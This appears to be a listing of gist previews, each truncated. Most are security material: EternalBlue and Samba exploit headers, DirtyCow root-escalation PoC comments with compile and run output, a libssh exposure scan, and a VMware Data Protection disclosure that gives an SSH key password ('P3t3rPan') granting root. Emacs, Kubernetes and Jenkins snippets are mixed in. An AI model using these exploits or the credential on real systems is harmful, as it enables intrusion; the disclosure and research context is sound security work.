An analysis of Censys Public Scan 20180807 (only port 22) to estimate the number of servers {potentially} vulnerable to the recent Libssh bug.
(defun my-lisp-load (filename) | |
"Load lisp from FILENAME" | |
(let ((fullname (expand-file-name (concat "spec/" filename) user-emacs-directory)) | |
lisp) | |
(when (file-readable-p fullname) | |
(with-temp-buffer | |
(progn | |
(insert-file-contents fullname) | |
(setq lisp | |
(condition-case nil |
#!/usr/bin/python | |
# This file has no update anymore. Please see https://github.com/worawit/MS17-010 | |
from impacket import smb, ntlm | |
from struct import pack | |
import sys | |
import socket | |
''' | |
EternalBlue exploit for Windows 8 and 2012 by sleepya | |
The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
#!/usr/bin/python | |
# This file has no update anymore. Please see https://github.com/worawit/MS17-010 | |
from impacket import smb | |
from struct import pack | |
import sys | |
import socket | |
''' | |
EternalBlue exploit for Windows 7/2008 by sleepya | |
The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
The VMware vSphere Data Protection (VDP) appliance is based on the EMC Avamar solution. To perform an in-depth analysis of VDP, a virtual test appliance of EMC Avamar was downloaded. Known Avamar default credentials did work fine on the Avamar appliance, but were not valid to log into the vSphere Data Protection. Further file system objects in the EMC Avamar appliance were analyzed, leading to the interesting detection of a private SSH key belonging to the admin user.
A web search did reveal that the corresponding password for the SSH key file is ‘P3t3rPan’ (see http://judsonian.com/content/licensing-an-avamar-system/). Using the SSH key file a login as admin to the VMware Data Protection was successful and did grant root permissions on the appliance.
11.08.2016 report of vulnerability to VMware Security Response team
/* | |
* CVE-2016-5195 dirtypoc | |
* | |
* This PoC is memory only and doesn't write anything on the filesystem. | |
* /!\ Beware, it triggers a kernel crash a few minutes. | |
* | |
* gcc -Wall -o dirtycow-mem dirtycow-mem.c -ldl -lpthread | |
*/ | |
#define _GNU_SOURCE |
/* | |
* (un)comment correct payload first (x86 or x64)! | |
* | |
* $ gcc cowroot.c -o cowroot -pthread | |
* $ ./cowroot | |
* DirtyCow root privilege escalation | |
* Backing up /usr/bin/passwd.. to /tmp/bak | |
* Size of binary: 57048 | |
* Racing, this may take a while.. | |
* /usr/bin/passwd overwritten |
Set up Kubernetes on 3 Debian Jessie virtual machines: One master. Two nodes. Additionally do this without any "magic" so that what is required to be running to make everything work is plain and obvious.
We will be using flannel for the inter-machine networking layer. Mainly because it is useful and it seems to be pretty popular.
#!/usr/bin/python | |
""" | |
Exploit for Samba vulnerabilty (CVE-2015-0240) by sleepya | |
The exploit only targets vulnerable x86 smbd <3.6.24 which 'creds' is controlled by | |
ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()' | |
in libtalloc does not write a value on 'creds' address. | |
Reference: | |
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/ |
Simple collection of Groovy scripts to help me maintain some Jenkins systems.
See also https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console
Please comment & let me know if you have a fork / fixes you'd like to include.